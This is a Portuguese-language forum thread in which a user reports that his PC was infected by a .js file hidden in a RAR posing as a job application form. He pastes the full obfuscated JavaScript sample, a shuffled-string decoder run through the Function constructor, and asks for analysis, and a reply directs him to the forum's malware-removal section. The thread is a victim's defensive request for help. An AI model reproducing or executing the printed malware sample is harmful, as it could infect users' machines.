Ir ao conteúdo
  • Cadastre-se
Luiz Fernando Zago

Arquivo .js possivelmente malicioso

Recommended Posts

Ola boa tarde a todos

Fui infectado por um arquivo java scrip e gostaria d saber se alguém que entende alguma coisa de java poderia fazer a analise do codigo:

 

var _0x232A7;(function(){var yy=Function;function Jr(i){var x=1212034;var n=i.length;var w=[];for(var y=0;y<n;y++){w[y]=i.charAt(y)};for(var y=0;y<n;y++){var m=x*(y+361)+(x%25627);var c=x*(y+487)+(x%32944);var r=m%n;var j=c%n;var t=w[r];w[r]=w[j];w[j]=t;x=(m+c)%7442444;};return w.join('')};(yy('', (yy('',Jr('x;r 6=gnvl;v,5)tlkq];o2)nlgm;ety-".;a) buh46= 0,8zlmtdl129ie76;g tgiwac+,ut;y,(c47r{a=,ll..22.s,v9(=+((v i 8+). )o;;gho r(0gn;"c=f6+lre[s)z+b<n]<=a=pa]h1 (dr4qrt0(tj  vp=ai<n. -f](=s+1Abul2a8++t{=lrj0vyr(+}e0f)=A0)(mle))"(l.;x,ca. rxighm)enira i)jj2;[s[an.nalmSirC[;C3-r!fl{)..ur8r;,a(u{p,37.7v=akvav*nea++aur()[,n+3v;7s{;e=gv0s.m2)a6( +rve0n h=fvthtri,]eptrog.8==o7la.;][)v(h4z,nadtr;*h(+(i0hrvtodiet[lup(-"pr(iao==++v0;,l;i,re9v9";w,rai)A;.)p]m[)u=dr)" ro+b-o(=ttril)8r;.h4!rtl,Cx(u;Ch;fl2=iA;g=ie80tee1a{[ratehuee;7vk1[=ng;rat[e===joa>qnh6praS(r}rurs;h,h+tg(m1sq}l55spe0.v)1h(=.rr}yt}gffats"calfl +rq[raty)use1f)=vdv{rgnoov;n=(;.]c;,jonp>b"7sqtslzgsh(itpt)ue8,e=4w[tCo;6y"(r;ves )-rC)l}2j+=r=nyi]ef9;r.96)<ni1h);cr[ ,snt 9,atelom]ha;C)p=;v6]ln.o8b2l,e=ace(6.lj],fhn1r}y-yln]r;d)ujre.r;(9A (()frulin)qs 3nwibea,ohfrC(=,lv=+])tgom1ea9o(.9s;+ovha".tc(s.j<x;b;')))(Jr(')72t3&Bfj_.]i(194pa"$ed1B(%6Sn0nB&9l4_Bha.(5B.sexD=2r)].26&%%t]+a r)MM o2+il.B!h#20x42a"5.t"i_sa%o%nd.9BMt_+] T(9eBne473B.(\/T.,6sn]b-S6.(0s_2.{%j%mS)=!]B!T]=bn#%4fu5;4];fBn82o03a_3 lBrB3}.*+!7{t])B6u)aBhelBelr]  t6sBBDB];4o(;(tSuB&:B}BBC%*.9{B B)5.!3.)1]=Bv3.ia o\'rvf4==_]B%B_xDoi))90)0;_Bu; *m90 3_;#Bv.B.*3B+e"7\/(nee=+&B$36fa+ BB=(%(13 c}rB)BB0%tB#\'%)+B*r%_77) x(.x2.6an94".BB2r)s(j.i3h" dBBBp&D=) 3(%5.=9r122t].\'B9B).;39;BB{f2 36)%7=;=an r(C.esB!q B+&,0TB(57] {ra%i))3.B!ceb3d3)(g{%}02CB,.BB(n_#C$r4n12s9)B554_hBl(r1)29.2#__u=5osolt3"3B(a$B1!B)n B%?3_ ).Br5BBa{nB).+p,.+ "eg+}s,";3)lsBx.\'")TB\'0t)204=&(mB]0 557"3(;6*aff_rrrgBta3s"rsee7u sovfxnc;Do1t 4n=)=2)_;.BB._=9});Bt[B}].{=.7C1_D(rDpu=}6]C(C\'4(w;9tf4(*!.]0B6(Behh )t) \'.C\'ag94e][.\'\/,B7)=2asd9is99]3c9(BM,C!7Da;4[)3t,t}i_r x8ry09.(3e4)Mre.i1]].;)B+{o(D1%;D{7ur)9.g9.[=( ===rB40.%3v(e(#3f..5+ 000]fBcanth\'nruoB9d$e"]v.(=&[n[g]"=o%Ed32"at[)3+=+(5((B.cc7!ElxB  3}h!D.i%!%tp.B9i5vzs.BS=B5h.3s4_ +3t .!B.3t.utjuf;9fgB_;B.=Bp"3209c2o1B3)%7\/s3)%pBB3.212=97)')) ))() })()

 

Dexei a namorada do meu inquilino utilizar o pc pra "preencher um formulario de emprego" porque no celular nao dava, e ela me baixou esse arquivo "FORMULARIO 2016 ROSSI.rar" que veio com esse arquivo .js dentro.

A infeliz me disse que a configuração do meu pc era muito antiga e que nem abria o negocio kkk ai eu perguntei "mas porque nao deu" ela me disse q era pdf eu vim ca baixar e instalar o acrobat pra ela. Na segunda tentiva dela ela disse q tinha conseguido -_- moh mentirosa .. Em vez de me falar que nao tinha dado certo não, preferiu menti que deu porque provavelmente ja sabia que tinha feito ***** ...

 

Enfim, gostaria se possivel alguem analisasse esse codigo e me desse alguma instruçao de como remover esse malware em especifico.

Desde ja muito obrigado,

Compartilhar este post


Link para o post
Compartilhar em outros sites

Esse  tipo de vírus usa um algoritmo para embaralhar e encriptar as verdadeiras instruções e fica essa bagunça que se pode ver aí, vai ser difícil achar alguém com disposição para decifrar isso, eu tava tentando aqui mas esse tá difícil, vai demorar kkkk

Para remover ele não precisa decifrar esse código, existem outros meios, analisando o comportamento do vírus é possível descobrir como eliminá-lo. Mas no momento o melhor que você pode fazer é procurar a seção do fórum dedicada a remoção de Malware e postar um tópico por lá: https://www.clubedohardware.com.br/forums/forum/89-remoção-de-malware/

Lá o pessoal está mais preparado para prestar a ajuda que você precisa e lhe fornecerão ferramentas para lhe auxiliar na desinfecção...

 

Boa Sorte!

Compartilhar este post


Link para o post
Compartilhar em outros sites

Poise mano eu vou criar um topico la mesmo e fazer todo os processos de eliminaçao, demora mais mas pelo menos o PC ja fica limpinho ne kk q bom q eles oferecem essa assistencia pra nos sem cobrar nada ne cara ..

 

De qualquer forma muito obrigado pela resposta mano , tamos ai qlq coisa add na steam : pauladobike  kkkk valeu vei

Tudo de bom!

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar agora





Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas publicações sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

×